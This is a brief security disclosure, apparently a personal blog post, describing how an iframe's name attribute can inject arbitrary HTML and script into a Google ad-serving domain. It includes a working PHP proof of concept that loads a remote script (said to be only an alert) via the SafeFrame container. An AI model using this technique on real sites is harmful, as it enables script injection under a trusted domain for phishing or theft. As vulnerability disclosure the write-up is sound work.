Embed any HTML into tpc.googlesyndication.com

Google uses tpc.googlesyndication.com for its adserving. They basically allow anything to run on this domain. There is a container html file hosted on this domain which reads the name of the iframe and injects the name content into the page. We can use this to run anything we want on this google domain.

Example php code:

<?php

$html = '<script src="http://dubbelboer.com/googlebug/exploit.js"></script>';

// The format for the name needs to be "1-0-1;<length of content>;<content>"
echo '<iframe name="1-0-1;' . strlen($html) . ';' . htmlentities($html) . '"';
echo ' src="http://tpc.googlesyndication.com/safeframe/1-0-1/html/container.html"></iframe>';

This example can be found at http://dubbelboer.com/googlebug/index.php

In my example exploit.js just contains an alert statement to show the domain. In theory this could contain any code.

This has been reported to google but they said they don’t care what is run on the domain. I guess they never place any sensitive cookies on this domain and don’t expect others to do either.